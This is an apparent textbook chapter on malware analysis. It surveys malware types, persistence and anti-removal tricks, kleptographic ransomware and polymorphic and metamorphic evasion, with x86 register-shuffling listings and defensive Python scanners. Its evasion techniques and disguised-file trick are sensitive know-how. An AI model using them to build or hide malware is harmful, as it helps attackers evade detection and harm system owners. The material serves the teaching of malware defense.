Malicious software (or malware) is any program that works against the interests of the system's user or owner. Generally speaking, computer users expect the computer and all of the software running on it to work on their behalf. Any program that violates this rule is considered malware, because it works in the interest of other people. Sometimes the distinction can get fuzzy. Imagine what happens when a company CEO decides to spy on all company employees. There are numerous programs available that report all kinds of usage statistics and Web-browsing habits. These can be considered malware because they work against the interest of the system's end user and are often extremely difficult to remove.
This chapter introduces the concept of malware and describes the purpose of these programs and how they work. We will be getting into the different types of malware currently in existence, and we'll describe the various techniques they employ in hiding from end users and from antivirus programs.
This topic is related to reversing because reversing is the strongest weapon we, the good people, have against creators of malware. Antivirus researchers routinely engage in reversing sessions in order to analyze the latest malicious programs, determine just how dangerous they are, and learn their weaknesses so that effective antivirus programs can be developed. This chapter opens with a general discussion on some basic malware concepts, and proceeds to demonstrate the malware analysis process on real-world malware.
Malicious code is so prevalent these days that there is widespread confusion regarding the different types of malware currently in existence. The following sections discuss the most popular types of malicious software and explain the differences between them and the dangers associated with them.
Viruses are self-replicating programs that usually have a malicious intent. They are the oldest breed of malware and have become slightly less popular these days, now that there is the Internet. The unique thing about a virus that sets it apart from all other conventional programs is its self-replication. What other program do you know of that actually makes copies of itself whenever it gets the chance? Over the years, there have been many different kinds of viruses, some harmful ones that would delete valuable information or freeze the computer, and others that were harmless and would simply display annoying messages in an attempt to grab the user's attention.
Viruses typically attach themselves to executable program files (such as .exe files on Windows) and slowly duplicate themselves into many executable files on the infected system. As soon as an infected executable is somehow transferred and executed on another machine, that machine becomes infected as well. This means that viruses almost always require some kind of human interaction in order to replicate—they can't just "flow" into the machine next door. Actual viruses are considered pretty rare these days. The Internet is such an attractive replication medium for malicious software that almost every malicious program utilizes it in one way or another. A malicious program that uses the Internet to spread is typically called a worm.
A worm is fundamentally similar to a virus in the sense that it is a self-replicating malicious program. The difference is that a worm self-replicates using a network (such as the Internet), and the replication process doesn't require direct human interaction. It can take place in the background; the user doesn't even have to touch the computer. As you can probably imagine, worms have the (well-proven) potential to spread uncontrollably and in remarkably brief periods of time. In a world where almost every computer system is attached to the same network, worms can very easily search for and infect new systems.
Worms can spread using several different techniques. One method by which a modern worm spreads is taking advantage of certain operating system or application program vulnerabilities that allow it to hide in a seemingly innocent data packet. These are the vulnerabilities we discussed in Chapter 7, which can be utilized by attackers in a variety of ways, but they're most commonly used for developing malicious worms. Another common infection method for modern worms is e-mail. Mass mailing worms typically scan the user's contact list and mail themselves to every contact on such a list. It depends on the specific e-mail program, but in most cases the recipient will have to manually open the infected attachment in order for the worm to spread. Not so with vulnerability-based attacks; these rarely require an end-user operation to penetrate a system.
I'm sure you've heard the story about the Trojan horse. The general idea is that a Trojan horse is an innocent artifact openly delivered through the front door when it in fact contains a malicious element hidden somewhere inside of it. In the software world, this translates to seemingly innocent files that actually contain some kind of malicious code underneath. Most Trojans are actually functional programs, so that the user never becomes aware of the problem; the functional element in the program works just fine, while the malicious element works behind the user's back to promote the attacker's interests.
It's really quite easy to go about hiding unwanted functionality inside a useful program. The elegant way is to simply embed a malicious element inside an otherwise benign program. The victim then receives the infected program, launches it, and remains completely oblivious to the fact that the system has been infected. The original application continues to operate normally to eliminate any suspicion.
Another way to implement Trojans that is slightly less elegant (yet quite effective) is to fool users into believing that a file containing a malicious program is really some kind of innocent file, such as a video clip or an image. This is particularly easy under Windows, where file types are determined by their extensions rather than by examining their headers. This means that a remarkably silly trick such as hiding the file's real extension after a couple of hundred spaces actually works. Consider, for example, a file whose name is "A Great Picture.jpg" followed by a long run of spaces and then ".exe". Depending on the program showing the file name, there might not be room to show the whole thing, so it might appear as something like "A Great Picture.jpg . . .", essentially hiding the fact that the file is really a program and not a JPEG picture. One problem with this trick is that Windows will still usually show the generic application icon for such a file; however, when the executable carries an icon of its own, Windows shows that icon instead. All one would have to do is create an executable that has the default Windows picture icon as its program icon and name it something similar to the example.
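The padded-extension trick is easy to check for mechanically. The following is a minimal sketch, in Python, of how a mail filter or file viewer might flag such names. The function name, the two extension lists, and the three-space threshold are all assumptions made for illustration; a real filter would need far more complete lists.

```python
import re

# Illustrative, incomplete list of extensions that Windows treats as programs.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat"}
# Illustrative list of extensions a user would assume to be harmless data.
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png", ".txt", ".avi", ".mpg"}


def looks_disguised(file_name: str) -> bool:
    """Return True if an executable name appears to pose as a data file."""
    lowered = file_name.lower().rstrip()
    final_dot = lowered.rfind(".")
    if final_dot == -1:
        return False
    if lowered[final_dot:] not in EXECUTABLE_EXTENSIONS:
        return False  # the real extension is not a program extension
    stem = lowered[:final_dot]
    # A run of padding spaces right before the real extension is a strong hint
    # (the threshold of three spaces is an arbitrary assumption).
    padded = re.search(r"\s{3,}$", stem) is not None
    # So is a decoy extension sitting just before the real one.
    decoy = any(stem.rstrip().endswith(ext) for ext in DECOY_EXTENSIONS)
    return padded or decoy


if __name__ == "__main__":
    sample = "A Great Picture.jpg" + " " * 200 + ".exe"
    print(looks_disguised(sample))       # the padded name is flagged
    print(looks_disguised("setup.exe"))  # an honest program name is not
```

A check like this only looks at the name. It says nothing about what the file actually contains, which is a separate question.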
A backdoor is a type of malicious software that creates a (usually covert) access channel that the attacker can use for connecting, controlling, spying, or otherwise interacting with the victim's system. Some backdoors come in the form of actual programs that when executed can enable an attacker to remotely connect to the system and use it for a variety of activities. Other backdoors can actually be planted into the program source code right from the beginning by a rogue software developer. If you're thinking that software vendors double-check their source code before the product is shipped, think again. The general rule is that if it works, there's nothing to worry about. Even if the code was manually checked, it is possible to bury a backdoor deep within the source code, in a way that would require an extremely keen eye to notice. It is precisely these types of problems that make open-source software so attractive—these things rarely happen in open-source products.
Mobile code is a class of benign programs that are specifically meant to be mobile and be executed on a large number of systems without being explicitly installed by end users. Most of today's mobile programs are designed to create a more active Web-browsing experience. This includes all kinds of interactive Java applets and ActiveX controls that allow Web sites to embed highly responsive animated content, 3-D presentations, and so on. Depending on the specific platform, these programs essentially enable Web sites to quickly download and launch a program on the end user's system. In most cases (but not all), the user receives a confirmation message saying a program is about to be installed and launched locally. Still, as mentioned earlier, many users seem to "automatically" click the confirmation button, without even considering the possibility that potentially malicious code is about to be downloaded into their system.
The term mobile code only determines how the code is distributed and not the technical details of how it is executed. Certain types of mobile code, such as JavaScript, are distributed in source code form, which makes them far easier to dissect. Others, such as ActiveX components, are conventional PE executables that contain native IA-32 machine code; these are probably the most difficult to analyze. Finally, some mobile code components, such as Java applets, are presented in bytecode form, which makes them highly vulnerable to decompilation and reverse engineering.
Adware and spyware make up a relatively new category of malicious programs that has become extremely popular. There are several different types of programs that are part of this category, but probably the most popular ones are the adware-type programs. Adware programs force unsolicited advertising on end users. The idea is that the program gathers various statistics regarding the end user's browsing and shopping habits (sometimes transmitting that data to a centralized server) and uses that information to display targeted ads to the end user. Adware is distributed in many ways, but the primary distribution method is to bundle the adware with free software. The free software is essentially funded by the advertisements displayed by the adware program.
There are several problems with these programs that effectively turn them into a major annoyance that can completely ruin the end-user experience on an infected system. First of all, in some programs the advertisements can appear out of nowhere, regardless of what the end user is doing. This can be highly distracting and annoying. Second, the way in which these programs interface with the operating system and with the Web browser is usually so aggressive and poorly implemented that many of these programs end up reducing the performance and robustness of the system. In Internet Explorer for example, it is not uncommon to see the browser on infected systems freeze for a long time just because a spyware DLL is poorly implemented and doesn't properly use multithreaded code. The interesting thing is that this is not intentional—the adware/spyware developers are simply careless, and they tend to produce buggy code.
Some malicious programs, especially spyware/adware programs that have high user visibility, invest a lot of energy into preventing users from manually uninstalling them. One simple way to go about doing this is to simply not offer an uninstall program, but that's just the tip of the iceberg. Some programs go to great lengths to ensure that no one, especially no user (as opposed to a program that is specifically crafted for this purpose), can remove them.
Here is an example on how this is possible under Windows. It is possible to install registry keys that instruct Windows to always launch the malware as soon as the system is started. The program can constantly monitor those keys while it is running to make sure those keys are never deleted. If they are, the program can immediately reinstate them. The way to fight this trick from the user's perspective would be to try and terminate the program and then delete the keys. In such case, the malware can use two separate processes, each monitoring the other. When one is terminated, the other immediately launches it again. This makes it quite difficult to get both of them to go away. Because both executables are always running, it becomes very difficult to remove the executable files from the hard drive (because they are locked by the operating system).
Scattering copies of the malware engine throughout various components in the system, such as Web browser add-ons and the like, is another approach. Each of these components constantly ensures that none of the others has been removed. If one has been, the damaged component is reinstalled immediately.
Many people have said the following, and it is becoming quite obvious: Today's malware is just the tip of the iceberg; it could be made far more destructive. In the future, malicious programs could take over computer systems at such low levels that it would be difficult to create any kind of antidote software simply because the malware would own the platform and would be able to control the antivirus program itself. Additionally, the concept of information-stealing worms could some day become a reality, allowing malware developers to steal their victims' valuable information and hold it for ransom!
The following sections discuss some futuristic malware concepts and attempt to assess their destructive potential.
Cryptography is a wonderful thing, but in some cases it can be utilized to perpetrate malicious deeds. Present-day malware doesn't really use cryptography all that much, but this could easily change. Asymmetric encryption creates new possibilities for the creation of information-stealing worms [Young]. These are programs that could potentially spread like any other worm, except that they would locate valuable data on an infected system (such as documents, databases, and so on) and steal it. The actual theft would be performed by encrypting the data using an asymmetric cipher; asymmetric ciphers are encryption algorithms that use a pair of keys. One key (the public key) is used for encrypting the data and another (the private key) is used for decrypting the data. It is not possible to obtain one key from the other.
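To make the key-pair idea concrete, here is a toy RSA sketch in Python. RSA is just one asymmetric cipher, chosen here for illustration; the text does not say which cipher such a worm would use. The primes are deliberately tiny so that the arithmetic can be followed by hand. With numbers this small the private key is trivial to recover from the public one, so the "not possible to obtain one key from the other" property only holds for realistically large keys.

```python
# Toy RSA with tiny primes, for illustration only. Real keys use primes that
# are hundreds of digits long, and real systems add padding schemes.
p, q = 61, 53
n = p * q                  # modulus shared by both keys (3233)
phi = (p - 1) * (q - 1)    # 3120
e = 17                     # public exponent, coprime to phi
d = pow(e, -1, phi)        # private exponent: modular inverse of e (Python 3.8+)

PUBLIC_KEY = (e, n)
PRIVATE_KEY = (d, n)


def encrypt(message: int, public_key) -> int:
    """Encrypt a number smaller than n using only the public key."""
    exponent, modulus = public_key
    return pow(message, exponent, modulus)


def decrypt(ciphertext: int, private_key) -> int:
    """Recover the message; this requires the private key."""
    exponent, modulus = private_key
    return pow(ciphertext, exponent, modulus)


if __name__ == "__main__":
    secret = 65
    locked = encrypt(secret, PUBLIC_KEY)
    print(locked, decrypt(locked, PRIVATE_KEY))
```

The point to notice is that `encrypt` never touches `d`. Anyone holding only the public key can lock data but cannot unlock it.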
An information-stealing (or kleptographic) worm could simply embed an encryption key inside its body, and start encrypting every bit of data that appears to be valuable (certain file types that typically contain user data, and so on). By the time the end user realized what had happened, it would already be too late. There could be extremely valuable information sitting on the infected system that's as good as gone. Decryption of the data would not be possible—only the attacker would have the decryption key. This would open the door to a brand-new level of malicious software attacks: attackers could actually blackmail their victims.
Needless to say, actually implementing this idea is quite complicated. Probably the biggest challenge (from an attacker's perspective) would be to demand the ransom and successfully exchange the key for the ransom while maintaining full anonymity. Several theoretical approaches to these problems are discussed in [Young], including zero-knowledge proofs that could be used to allow an attacker to prove that he or she is in possession of the decryption key without actually exposing it.
The basic premise of most malware defense strategies is to leverage the fact that there is always some kind of trusted element in the system. After all, how can an antivirus program detect a malicious program if it can't trust the underlying system? For instance, consider an antivirus program that scans the hard drive for infected files and simply uses high-level file-system services in order to read files from the hard drive and determine whether they are infected or not. A clever malicious program could relatively easily install itself as a file-system filter that would intercept the antivirus program's file system calls and present it with fake versions of the files on disk (these would usually be the original, uninfected versions of those files). It would simply hide the fact that it has infected numerous files on the hard drive from the antivirus program!
That is why most security and antivirus programs enter deep into the operating system kernel; they must reside at a low enough level so that malicious programs can't distort their view of the system by implementing file-system filtering or a similar approach.
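The difference between a scanner that trusts high-level services and one that reads from a lower level can be shown with a toy model. This Python sketch is not a real file-system filter: `RawDisk`, `FilteredView`, and the `INFECTED` marker are hypothetical stand-ins that only model the two views of the same files.

```python
INFECTION_MARKER = b"INFECTED"  # hypothetical stand-in for a real signature


class RawDisk:
    """Models the low-level, unfiltered contents of the disk."""

    def __init__(self, files):
        self._files = dict(files)

    def read(self, name):
        return self._files[name]


class FilteredView:
    """Models a high-level view in which a hostile filter swaps in clean copies."""

    def __init__(self, disk, clean_copies):
        self._disk = disk
        self._clean_copies = dict(clean_copies)

    def read(self, name):
        if name in self._clean_copies:
            return self._clean_copies[name]  # the scanner is shown a fake
        return self._disk.read(name)


def scan(reader, names):
    """Return the names whose contents contain the infection marker."""
    return [name for name in names if INFECTION_MARKER in reader.read(name)]


def cross_view_differences(low_level, high_level, names):
    """Return the names for which the two views disagree."""
    return [n for n in names if low_level.read(n) != high_level.read(n)]


if __name__ == "__main__":
    names = ["app.exe", "notes.txt"]
    raw = RawDisk({"app.exe": b"MZ..INFECTED..", "notes.txt": b"hello"})
    filtered = FilteredView(raw, {"app.exe": b"MZ..clean.."})
    print(scan(filtered, names))  # the high-level scan sees nothing wrong
    print(scan(raw, names))       # the low-level scan finds the infected file
```

Comparing the two views, as `cross_view_differences` does, is one way a tool with low-level access could notice that something is filtering what the high-level services report.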
Here is where things could get nasty. What would happen if a malicious program altered an extremely low-level component? This would be problematic because the antivirus programs would be running on top of this infected component and would have no way of knowing whether they are seeing an authentic picture of the system, or an artificial one painted by a malicious program that doesn't want to be found. Let's take a quick look at how this could be possible.
The lowest level at which a malicious program could theoretically infect a system is the CPU or other hardware devices that use upgradeable firmware. Most modern CPUs actually run very low-level code that implements each and every supported assembly language instruction using low-level instructions called micro-ops (μ-ops). The μ-op code that runs inside the processor is called firmware, and can usually be updated at the customer site using a special firmware-updating program. This is a sensible design decision since it enables software-level bug fixes that would otherwise require physically replacing the processor. The same goes for many hardware devices such as network and storage adapters. They are often based on programmable microcontrollers that support user-upgradeable firmware.
It is not exactly clear what a malicious program could do at the firmware level, if anything, but the prospects are quite chilling. Malicious firmware would theoretically be included as a part of a larger malicious program and could be used to hide the existence of the malicious program from security and antivirus programs. It would compromise the integrity of the only trustworthy component in a computer system: the hardware. In reality, it would not be easy to implement this kind of attack. The contents of firmware update files made for Intel processors appear to be encrypted (with the decryption key hidden safely inside the processor), and their exact contents are not known. For more information on this topic see Malware: Fighting Malicious Code by Ed Skoudis and Lenny Zeltser [Skoudis].
There are different types of motives that drive people to develop malicious programs. Some developers are interest-driven: The developer actually gains some kind of financial reward by spreading the programs. Others are motivated by certain psychological urges or by childish desires to beat the system. It is hard to classify malware in this way by just looking at what it does. For example, when you run into a malicious program that provides backdoor access to files on infected machines, you might never know whether the program was developed for stealing valuable corporate data or to allow the attacker to peep into some individual's personal files.
Let's take a look at the most typical purposes of malicious programs and try to discover what motivates people to develop them.
Backdoor Access: This is a popular end goal for many malicious programs. The attacker gets unlimited access to the infected machine and can use it for a variety of purposes.
Denial-of-Service (DoS) Attacks: These attacks are aimed at damaging a public server hosting a Web site or other publicly available resource. The attack is performed by simply programming all infected machines (which can be a huge number of systems) to try to connect to the target resource at the exact same time and simply keep on trying. In many cases, this causes the target server to become unavailable, either due to its Internet connection being saturated, or due to its own resources being exhausted. In these cases, there is typically no direct benefit to the attacker, except perhaps revenge. One direct benefit could occur if the owner of the server under attack were a direct business competitor of the attacker.
Vandalism: Sometimes people do things for pure vandalism. An attacker might gain satisfaction and self-importance from deleting a victim's precious files or causing other types of damage. People have a natural urge to make an impact on the world, and unfortunately some people don't care whether it's a negative or a positive impact.
Resource Theft: A malicious program can be used to steal other people's computing and networking resources. Once an attacker has a carefully crafted malicious program running on many systems, he or she can start utilizing these systems for extra computing power or extra network bandwidth.
Information Theft: Finally, malicious programs can easily be used for information theft. Once a malicious program penetrates into a host, it becomes exceedingly easy to steal files and personal information from that system. If you are wondering where a malicious program would send such valuable information without immediately exposing the attacker, the answer is that it would usually send it to another infected machine, from which the attacker could retrieve it without leaving any trace.
Malware suffers from the same basic problem as copy protection technologies—they run on untrusted platforms and are therefore vulnerable to reversing. The logic and functionality that resides in a malicious program are essentially exposed for all to see. No encryption-based approach can address this problem because it is always going to have to remain possible for the system's CPU to decrypt and access any code or data in the program. Once the code is decrypted, it is going to be possible for malware researchers to analyze its code and behavior—there is no easy way to get around this problem.
There are many ways to hide malicious software, some aimed at hiding it from end users, while others aim at hindering the process of reversing the program so that it survives longer in the wild. Hiding the program can be as simple as naming it in a way that would make end users think it is benign, or even embedding it in some operating system component, so that it becomes completely invisible to the end user.
Once the existence of a malicious program is detected, malware researchers are going to start analyzing and dissecting it. Most of this work revolves around conventional code reversing, but it also frequently relies on system tools such as network- and file-monitoring programs that expose the program's activities without forcing researchers to inspect the code manually. Still, the most powerful analysis method remains code-level analysis, and malware authors sometimes attempt to hinder this process by use of antireversing techniques. These are techniques that attempt to scramble and complicate the code in ways that prolong the analysis process. It is important to keep in mind that most of the techniques in this realm are quite limited and can only strive to complicate the process somewhat, but never to actually prevent it. Chapter 10 discusses these antireversing techniques in detail.
The easiest way for antivirus programs to identify malicious programs is by using unique signatures. The antivirus program maintains a frequently updated database of virus signatures, which aims to contain a unique identification for every known malware program. This identification is based on a unique sequence that was found in a particular strand of the malicious program.
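In its simplest form, signature matching is nothing more than a search for known byte sequences. The following Python sketch shows the idea. The signature names and byte values in `SIGNATURES` are made up for illustration and do not correspond to any real malware, and real scanners use far more efficient multi-pattern search than this.

```python
from typing import Dict, List

# Hypothetical signature database: name -> byte sequence unique to that program.
SIGNATURES: Dict[str, bytes] = {
    "Example.A": bytes.fromhex("deadbeef4142"),
    "Example.B": bytes.fromhex("0badf00d5a5a"),
}


def scan_bytes(data: bytes) -> List[str]:
    """Return the names of all signatures that occur anywhere in the data."""
    return sorted(name for name, sig in SIGNATURES.items() if sig in data)


def scan_file(path: str) -> List[str]:
    """Scan a file on disk by reading it whole and searching its bytes."""
    with open(path, "rb") as handle:
        return scan_bytes(handle.read())


if __name__ == "__main__":
    sample = b"header" + bytes.fromhex("deadbeef4142") + b"trailer"
    print(scan_bytes(sample))        # reports the matching signature name
    print(scan_bytes(b"clean data"))  # reports nothing
```

Everything hinges on the signature bytes appearing unchanged in every copy of the program, and that assumption is exactly what the techniques discussed next set out to break.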
Polymorphism is a technique that thwarts signature-based identification programs by randomly encoding or encrypting the program code in a way that maintains its original functionality. The simplest approach to polymorphism is based on encrypting the program using a random key and decrypting it at runtime. Depending on when an antivirus program scans the program for its signature, this might prevent accurate identification of a malicious program because each copy of it is entirely different (because it is encrypted using a random encryption key).
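A small experiment shows why a random key defeats a naive on-disk signature. This Python sketch encodes a harmless placeholder string with a single-byte XOR key, which is an assumption chosen as the simplest possible "encryption"; the text does not specify a cipher. `BODY`, `SIGNATURE`, and the function names are likewise hypothetical.

```python
import secrets
from typing import Optional

BODY = b"harmless placeholder body"  # stands in for the program's code
SIGNATURE = b"placeholder"           # what a scanner would look for


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key."""
    return bytes(b ^ key for b in data)


def encode_copy(body: bytes, key: Optional[int] = None) -> bytes:
    """Return one stored copy: the key byte followed by the encoded body."""
    if key is None:
        key = secrets.randbelow(255) + 1  # 1..255; a key of 0 would change nothing
    return bytes([key]) + xor_bytes(body, key)


def decode_copy(copy: bytes) -> bytes:
    """Undo encode_copy, as the program itself would do at runtime."""
    return xor_bytes(copy[1:], copy[0])


if __name__ == "__main__":
    first, second = encode_copy(BODY, 0x21), encode_copy(BODY, 0x5A)
    print(first != second)                               # the stored copies differ
    print(SIGNATURE in first, SIGNATURE in second)       # the signature is hidden
    print(decode_copy(first) == decode_copy(second) == BODY)
```

Once decoded, every copy is byte-for-byte identical again, which is why the in-memory form of such a program can still be matched against a signature.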
There are two significant weaknesses with these kinds of solutions. First of all, many antivirus programs might scan for virus signatures in memory. Because in most cases the program is going to be present in memory in its original, unencrypted form, the antivirus program won't have a problem matching the running program with the signature it has on file. The second weakness lies in the decryption code itself. Even if an antivirus program only uses on-disk files in order to match malware signatures, there is still the problem of the decryption code being static. For the program to actually be able to run, it must decrypt itself in memory, and it is this decryption code that could theoretically be used as the signature.
The solution to these problems generally revolves around rotating or scrambling certain elements in the decryption code (or in the entire program) in ways that alter its signature yet preserve its original functionality. Consider the following sequence as an example:
0040343B    8B45 CC    MOV EAX,[EBP-34]
0040343E    8B00       MOV EAX,[EAX]
00403440    3345 D8    XOR EAX,[EBP-28]
00403443    8B4D CC    MOV ECX,[EBP-34]
00403446    8901       MOV [ECX],EAX
00403448    8B45 D4    MOV EAX,[EBP-2C]
0040344B    8945 D8    MOV [EBP-28],EAX
0040344E    8B45 DC    MOV EAX,[EBP-24]
00403451    3345 D4    XOR EAX,[EBP-2C]
00403454    8945 DC    MOV [EBP-24],EAX
One almost trivial method that would make it a bit more difficult to identify this sequence would consist of simply randomizing the use of registers in the code. The code sequence uses registers separately at several different phases. Consider, for example, the instructions at 00403448 and 0040344E. Both instructions load a value into EAX, which is used in instructions that follow. It would be quite easy to modify these instructions so that the first uses one register and the second uses another register. It is even quite easy to change the base stack frame pointer (EBP) to use another general-purpose register.
Of course, you could change way more than just registers (see the following section on metamorphism), but by restricting the magnitude of the modification to something like register usage you're enabling the creation of fairly trivial routines that would simply know in advance which bytes should be modified in order to alter register usage—it would all be hard-coded, and the specific registers would be selected randomly at runtime.
0040343B    8B57 CC    MOV EDX,[EDI-34]
0040343E    8B02       MOV EAX,[EDX]
00403440    3347 D8    XOR EAX,[EDI-28]
00403443    8B5F CC    MOV EBX,[EDI-34]
00403446    8903       MOV [EBX],EAX
00403448    8B77 D4    MOV ESI,[EDI-2C]
0040344B    8977 D8    MOV [EDI-28],ESI
0040344E    8B4F DC    MOV ECX,[EDI-24]
00403451    334F D4    XOR ECX,[EDI-2C]
00403454    894F DC    MOV [EDI-24],ECX
This code provides an equivalent-functionality alternative to the original sequence. The bytes that have changed from the original representation are the second byte of each instruction, which is the ModR/M byte that selects the registers. To simplify the implementation of such a transformation, it is feasible to simply store a list of predefined bytes that could be altered and in what way they can be altered. The program could then randomly fiddle with the available combinations during the self-replication process and generate a unique machine code sequence. Because this kind of implementation requires the creation of a table of hard-coded information regarding the specific code bytes that can be altered, this approach would only be feasible when most of the program is encrypted or encoded in some way, as described earlier. It would not be practical to manually scramble an entire program in this fashion. Additionally, it goes without saying that all registers must be saved and restored before entering a function that can be polymorphed in this fashion.
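From an analyst's point of view, it is instructive to compare the two listings byte by byte. The following Python sketch does that, using the machine code bytes copied from the two sequences above. The helper names are my own, and the ModR/M decoder is deliberately simplified: it ignores the SIB and 32-bit displacement forms, which do not occur in these ten instructions.

```python
# IA-32 register numbering as used in the ModR/M byte.
REGISTERS = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

# Machine code of the original sequence and of the register-shuffled variant.
ORIGINAL = bytes.fromhex(
    "8B45CC 8B00 3345D8 8B4DCC 8901 8B45D4 8945D8 8B45DC 3345D4 8945DC"
)
VARIANT = bytes.fromhex(
    "8B57CC 8B02 3347D8 8B5FCC 8903 8B77D4 8977D8 8B4FDC 334FD4 894FDC"
)


def decode_modrm(byte: int):
    """Split a ModR/M byte into (mod, reg name, r/m name).

    Simplified: the r/m field is always reported as a register name.
    """
    mod = byte >> 6
    reg = REGISTERS[(byte >> 3) & 7]
    rm = REGISTERS[byte & 7]
    return mod, reg, rm


def differing_offsets(first: bytes, second: bytes):
    """Return the offsets at which two equal-length sequences differ."""
    return [i for i, (x, y) in enumerate(zip(first, second)) if x != y]


if __name__ == "__main__":
    for offset in differing_offsets(ORIGINAL, VARIANT):
        before = decode_modrm(ORIGINAL[offset])
        after = decode_modrm(VARIANT[offset])
        print(f"+{offset:02X}: {before} -> {after}")
```

Every differing offset turns out to be a ModR/M byte. The opcodes and the stack displacements are untouched, which is what makes a small hard-coded table of patchable bytes sufficient for this kind of modification.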
Because polymorphism is limited to very superficial modifications on the malware's decryption code, there are still plenty of ways for antivirus programs to identify polymorphed code by analyzing the code and extracting certain high-level information from it.
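One simple way a scanner could cope with register shuffling is a signature with wildcards in the positions that are known to vary. The Python sketch below is an assumption about how such matching might look, not a description of any particular antivirus product. The `??` pattern syntax and function names are hypothetical, and the test bytes are the first three instructions of the two sequences shown earlier.

```python
from typing import List, Optional

Pattern = List[Optional[int]]


def parse_pattern(text: str) -> Pattern:
    """Parse a hex pattern in which '??' matches any single byte."""
    return [None if token == "??" else int(token, 16) for token in text.split()]


def matches_at(data: bytes, offset: int, pattern: Pattern) -> bool:
    """Check whether the pattern matches the data starting at offset."""
    if offset + len(pattern) > len(data):
        return False
    return all(
        expected is None or data[offset + i] == expected
        for i, expected in enumerate(pattern)
    )


def find_pattern(data: bytes, pattern: Pattern) -> int:
    """Return the first matching offset, or -1 if there is none."""
    for offset in range(len(data) - len(pattern) + 1):
        if matches_at(data, offset, pattern):
            return offset
    return -1


# Opcodes and displacements are fixed; the register-selecting bytes are wildcards.
WILDCARD_SIGNATURE = parse_pattern("8B ?? CC 8B ?? 33 ?? D8")

if __name__ == "__main__":
    original = bytes.fromhex("8B45CC8B003345D8")
    variant = bytes.fromhex("8B57CC8B023347D8")
    print(find_pattern(original, WILDCARD_SIGNATURE))
    print(find_pattern(variant, WILDCARD_SIGNATURE))
```

The trade-off is that every wildcard makes the signature less specific, so a pattern this short would be prone to false positives on ordinary programs.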
This is where metamorphism enters into the picture. Metamorphism is the next logical step after polymorphism. Instead of encrypting the program's body and making slight alterations in the decryption engine, it is possible to alter the entire program each time it is replicated. The benefit of metamorphism (from a malware writer's perspective) is that each version of the malware can look radically different from any other versions. This makes it very difficult (if not impossible) for antivirus writers to use any kind of signature-matching techniques for identifying the malicious program.
Metamorphism requires a powerful code analysis engine that actually needs to be embedded into the malicious program. This engine scans the program code and regenerates a different version of it on the fly every time the program is duplicated. The clever part here is the type of changes made to the program. A metamorphic engine can perform a wide variety of alterations on the malicious program (needless to say, the alterations are performed on the entire malicious program, including the metamorphic engine itself). Let's take a look at some of the alterations that can be automatically applied to a program by a metamorphic engine.
Instruction and Register Selection: Metamorphic engines can actually analyze the malicious program in its entirety and regenerate the code for the entire program. While reemitting the code the metamorphic engine can randomize a variety of parameters regarding the code, including the specific selection of instructions (there is usually more than one instruction that can be used for performing any single operation), and the selection of registers.
Instruction Ordering: Metamorphic engines can sometimes randomly alter the order of instructions within a function, as long as the instructions in question are independent of one another.
Reversing Conditions: In order to seriously alter the malware code, a metamorphic engine can actually reverse some of the conditional statements used in the program. Reversing a condition means (for example) that instead of using a statement that checks whether two operands are equal, you check whether they are unequal (this is routinely done by compilers in the compilation process; see Appendix A). This results in a significant rearrangement of the program's code because it forces the metamorphic engine to relocate conditional blocks within a single function. The idea is that even if the antivirus program employs some kind of high-level scanning of the program in anticipation of a metamorphic engine, it would still have a hard time identifying the program.
Garbage Insertion: It is possible to randomly insert garbage instructions that manipulate irrelevant data throughout the program in order to further confuse antivirus scanners. This also adds a certain amount of confusion for human reversers that attempt to analyze the metamorphic program.
Function Order: The order in which functions are stored in the module matters very little to the program at runtime, and randomizing it can make the program somewhat more difficult to identify.
To summarize, by combining all of the previously mentioned techniques (and possibly a few others), metamorphic engines can create some truly flexible malware that can be very difficult to locate and identify.
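Of the alterations listed above, function reordering is the easiest one for a scanner to neutralize, and a short sketch shows why. This Python example assumes that the analyst has already split the module into individual function bodies, which is the hard part and is not shown. The function name and the use of SHA-256 are my own choices for illustration.

```python
import hashlib
from typing import Iterable


def function_order_fingerprint(function_bodies: Iterable[bytes]) -> str:
    """Fingerprint a set of function bodies regardless of their order.

    Each body is hashed separately, the digests are sorted, and the sorted
    list is hashed again, so shuffling the functions changes nothing.
    """
    digests = sorted(hashlib.sha256(body).digest() for body in function_bodies)
    return hashlib.sha256(b"".join(digests)).hexdigest()


if __name__ == "__main__":
    # Placeholder byte strings standing in for three function bodies.
    f1, f2, f3 = b"\x55\x8b\xec\xc3", b"\x33\xc0\xc3", b"\x90\xc3"
    print(function_order_fingerprint([f1, f2, f3])
          == function_order_fingerprint([f3, f1, f2]))
```

A fingerprint like this survives reordering only. Any of the other alterations, such as garbage insertion or register reselection, changes the function bodies themselves and therefore changes the result.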
The remainder of this chapter is dedicated to describing a reversing session of an actual malicious program. I've intentionally made the discussion quite detailed, so that readers who aren't properly set up to try this at home won't have to. I would only recommend that you try this out if you can allocate a dedicated machine that is not connected to any network, either local or the Internet. It is also possible to use a virtual machine product such as Microsoft Virtual PC or VMware Workstation, but you must make sure the virtual machine is completely detached from the host and from the Internet. If your virtual machine is connected to a network, make sure that network is connected to neither the Internet nor the host.
If you need to transfer any executables (such as the malicious program itself) from your primary system into the test system you should use a recordable CD or DVD, just to make sure the malicious program can't replicate itself into that disc and infect other systems. Also, when you store the malicious program on your hard drive or on a recordable CD, it might be wise to rename it with a nonexecutable extension, so that it doesn't get accidentally launched.
The HackArmy backdoor dissected in the following pages can be downloaded at this book's Web site at www.wiley.com/eeilam.
The HackArmy Trojan/Backdoor is the program I've chosen as our malware case study. It is relatively simple malware that is reasonably easy to reverse, and most importantly, it lacks any automated self-replication mechanisms. This is important because it means that there is no risk of this program spreading further because of your attempts to study it. Keep in mind that this is no reason to skimp on the security measures I discussed in the previous section. This is still a malicious program, and as such it should be treated with respect.
